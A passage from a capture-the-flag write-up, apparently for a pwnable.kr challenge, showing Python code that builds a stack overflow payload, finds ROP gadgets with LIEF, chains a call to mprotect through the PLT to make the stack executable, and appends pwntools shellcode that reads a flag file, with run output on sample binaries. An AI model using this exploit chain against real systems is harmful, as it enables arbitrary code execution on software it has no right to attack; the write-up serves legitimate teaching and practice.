                val = m.getValue()
                analysis['payload'][idx] = val
            addr = addr + ins.getSize()
        else:
            raise Exception('Could not solve')
    else:
        # Get new address
        addr = ctx.getConcreteRegisterValue(rip)

# Fill the buffer right until overwriting return address
for c in cyclic(analysis['buffer_size'], n=8):
    analysis['payload'].append(c)

ROP

So if we encoded the payload we have now we would overwrite memory up to the return address, so now we need to figure out how to ROP this thing.

If you look back into the C code you will see a function that calls mprotect with all zero values. That means that mprotect is imported and ready for us in the PLT, which is why I wanted to build a table of PLT entries. I want to ROP a call to mprotect.

My two favorite ROP tools are ropper and ROPgadget (fun fact: ROPgadget is built by the same guy who built Triton) but they failed me. I cannot set the rdx register with any of their gadgets but that is because they filter away crazy gadgets with crazy conditions.

Such as these beauties:

pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
mov rdx,r13 ; mov rsi,r14 ; mov edi,r15d ; call QWORD PTR [r12+rbx*8]
pop r15 ; ret

The last one is part of the first one so actually they are only two gadgets. I found these in all my samples.

The middle gadget sets rdx from r13 which is set in the first gadget. However it ends with a call to the address found at r12+rbx*8.

That is no problem however, since I can set rbx to zero, cancelling out the multiplication and set r12 to an address inside the payload. At that address I will put the address of the last gadget which pops off the return address from the call and then return to the next gadget…​which will be the mprotect PLT address.

The final address which mprotect will return to will be the address following our ROP payload, so whichever shellcode we want to execute should simply be appended to our payload and everything should work…​given it is small enough to share a 500 byte buffer with our 48 byte thinghy, stack buffer and ROP payload.

needles = [
    b"\x5b\x5d\x41\x5c\x41\x5d\x41\x5e\x41\x5f\xc3",         # pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
    b"\x4c\x89\xea\x4c\x89\xf6\x44\x89\xff\x41\xff\x14\xdc", # mov rdx,r13 ; mov rsi,r14 ; mov edi,r15d ; call QWORD PTR [r12+rbx*8]
    b"\x41\x5f\xc3",                                         # pop r15 ; ret
]
gadgets = [ None, None, None ]
for s in elf.segments:
    if s.type == lief.ELF.SEGMENT_TYPES.LOAD:
        if (s.flags.value & lief.ELF.SEGMENT_FLAGS.X.value) == lief.ELF.SEGMENT_FLAGS.X.value:
            base = s.virtual_address
            content = bytes(s.content)
            for i, needle in enumerate(needles):
                idx = content.find(needle)
                if idx >= 0:
                    gadgets[i] = base + idx

if None in gadgets:
    raise Exception("Missing ROP gadgets")

pop_a_lot = gadgets[0]
set_all = gadgets[1]
pop_ret = gadgets[2]
# Place shellcode after ROP chain
shellcode_addr = analysis['payload_addr'] + 48 + analysis['buffer_size'] + (8 * 10)
rop_chain = [
    pop_a_lot,                                        # pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
        0,                                            # rbx
        pop_ret,                                      # rbp (also address used by next call)
        analysis['payload_addr'] + 48 + analysis['buffer_size'] + (8 * 2), # r12, points to the value popped into rbx above
        7,                                            # r13 = PROT_READ|PROT_WRITE|PROT_EXEC, goes into rdx in the next gadget
        2 * PAGE_SIZE,                                # r14 = Two pages, goes into rsi in the next gadget
        page_down(shellcode_addr),                    # r15 = page base address of shellcode, goes into edi in the next gadget
    set_all,                                          # mov rdx,r13 ; mov rsi,r14 ; mov edi,r15d ; call QWORD PTR [r12+rbx*8]
    analysis['plt']['mprotect'],                      # "call" mprotect
    shellcode_addr                                    # Return to shellcode
]
for gadget in rop_chain:
    for c in p64(gadget):
        analysis['payload'].append(c)

Shellcode

My actual solution makes a shellcode optional. The default is one that reads the content of the flag file and exits cleanly.

I simply append the shellcode to my payload and finally xor and hex encode the thing. The result is what we pass to the binary as its argument or write back to the pwnable.kr service.

for c in shellcode or asm(
        shellcraft.cat('flag') + \
        shellcraft.exit(0)
        ):
    analysis['payload'].append(c)

# Now XOR and hex encode payload
analysis['encoded_payload'] = ''.join(f"{n ^ analysis['xor'][i % 2]:02x}" for i, n in enumerate(analysis['payload'])).encode('ascii')

Drum roll

I have a flag file in my current directory containing the text this is the flag. Running my solution against my samples yields this result:

$ ./solve.py samples/*
samples/elf001 analyzed in  849 ms: this is the flag
samples/elf002 analyzed in  791 ms: this is the flag
samples/elf003 analyzed in  696 ms: this is the flag
samples/elf004 analyzed in  606 ms: this is the flag
samples/elf005 analyzed in  616 ms: this is the flag
...
samples/elf097 analyzed in  611 ms: this is the flag
samples/elf098 analyzed in  628 ms: this is the flag
samples/elf099 analyzed in  659 ms: this is the flag
samples/elf100 analyzed in  609 ms: this is the flag
Average: 623 ms
Max: 849 ms
Min: 603 ms

Very fast indeed!

My actual solution only made one pass over the main function in Unicorn doing all the checks necessary in one code hook and one memory write hook (for speed) but I chose to split them up in more manageable pieces for clarity.